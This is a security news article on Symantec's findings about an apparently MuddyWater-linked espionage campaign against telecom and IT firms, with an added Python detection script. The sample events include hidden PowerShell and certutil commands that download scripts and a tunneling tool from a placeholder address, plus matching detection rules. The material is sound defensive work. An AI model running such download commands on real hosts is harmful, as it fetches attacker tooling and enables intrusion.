A new espionage campaign targeting telecommunication and IT service providers in the Middle East and Asia has been discovered by researchers. The campaign lasted six months, and there are possible ties to the Iranian-backed actor MERCURY (also known as SeedWorm, MuddyWater, or TEMP.Zagros). Symantec’s Threat Hunter Team gathered evidence and toolkit samples from recent attacks in Israel, Kuwait, Jordan, Saudi Arabia, the United Arab Emirates, Thailand, Pakistan, and Laos.
The attackers appear to be highly interested in vulnerable Exchange Servers, which they use to deploy web shells. After the initial intrusion, they harvest account credentials and move laterally through the corporate network. In some cases, they may use this foothold to pivot to other related organizations.
Although the infection vector is unclear, Symantec discovered a ZIP file entitled “Special discount program.zip” that contained an installer for remote desktop software, suggesting that the threat actors may be sending spear-phishing emails to specific individuals.
The first evidence of compromise is usually a Windows service created to launch a Windows Script File (WSF) that performs network reconnaissance. Further WSFs are then downloaded using PowerShell, Certutil is used to download tunneling tools, and WMI queries are run.
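As an added example (not from Symantec’s report or the campaign’s own scripts), the following Python applies three process-creation detections that match the behaviour described above: a service host (services.exe) launching wscript/cscript with a .wsf, PowerShell downloading a .wsf, and Certutil fetching a URL. The event records, their field names and the 203.0.113.10 address are constructed for illustration.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields);
# not real telemetry from the campaign. Field names are assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //B C:\ProgramData\svc\recon.wsf"},
    {"id": 2, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden (New-Object Net.WebClient)"
                     ".DownloadFile('http://203.0.113.10/s2.wsf','C:\\ProgramData\\s2.wsf')"},
    {"id": 3, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/tun.exe C:\\ProgramData\\tun.exe"},
    # Benign certutil use: hashing a file, no URL involved.
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -hashfile C:\\Users\\alice\\setup.msi SHA256"},
]

# Each rule: (name, predicate over one event). Matching is case-insensitive.
RULES = [
    # A Windows service whose host process immediately runs a .wsf script.
    ("service_launched_wsf",
     lambda e: e["parent_image"].lower().endswith(r"\services.exe")
               and re.search(r"\\[wc]script\.exe$", e["image"], re.I) is not None
               and re.search(r"\.wsf\b", e["command_line"], re.I) is not None),
    # PowerShell using a download primitive to fetch a further .wsf.
    ("powershell_wsf_download",
     lambda e: e["image"].lower().endswith("powershell.exe")
               and re.search(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b",
                             e["command_line"], re.I) is not None
               and re.search(r"\.wsf\b", e["command_line"], re.I) is not None),
    # Certutil abused as a downloader (-urlcache / -verifyctl with a URL).
    ("certutil_url_download",
     lambda e: e["image"].lower().endswith(r"\certutil.exe")
               and re.search(r"-urlcache|-verifyctl", e["command_line"], re.I) is not None
               and re.search(r"https?://", e["command_line"], re.I) is not None),
]


def detect(events):
    """Return (event id, rule name) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, matches in RULES:
            if matches(e):
                hits.append((e["id"], name))
    return hits


if __name__ == "__main__":
    for event_id, rule in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Each rule keys on a parent/child relationship or a download primitive rather than on a file name, so renaming the script or the tunneling binary does not evade it; the benign hashing use of Certutil (event 4) produces no alert.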
A report from Symantec explains, “Based on process lineage data, attackers seemed to use scripts extensively. These may be automated scripts used for collecting information and downloading additional tools.”
“However, in one instance, a command asks cURL for help, suggesting that there may have been at least some hands-on-keyboard activity on the part of the attackers.”
After establishing a presence in the target organization, the actors use the eHorus remote access tool to do the following:
- Deliver and run a (suspected) Local Security Authority Subsystem Service (LSASS) dumping tool.
- Deliver (what are thought to be) Ligolo tunneling tools.
- Use Certutil to retrieve a URL from what appears to be the Exchange Web Services (EWS) of other targeted firms.
Although attribution is not definitive, Symantec logged two IP addresses that overlap with infrastructure used in previous MuddyWater attacks. Furthermore, the toolkit bears significant resemblance to attacks identified by Trend Micro researchers in March 2021. However, because many Iranian state-backed actors use off-the-shelf tools and rotate infrastructure frequently, no definitive attribution can be made at this time.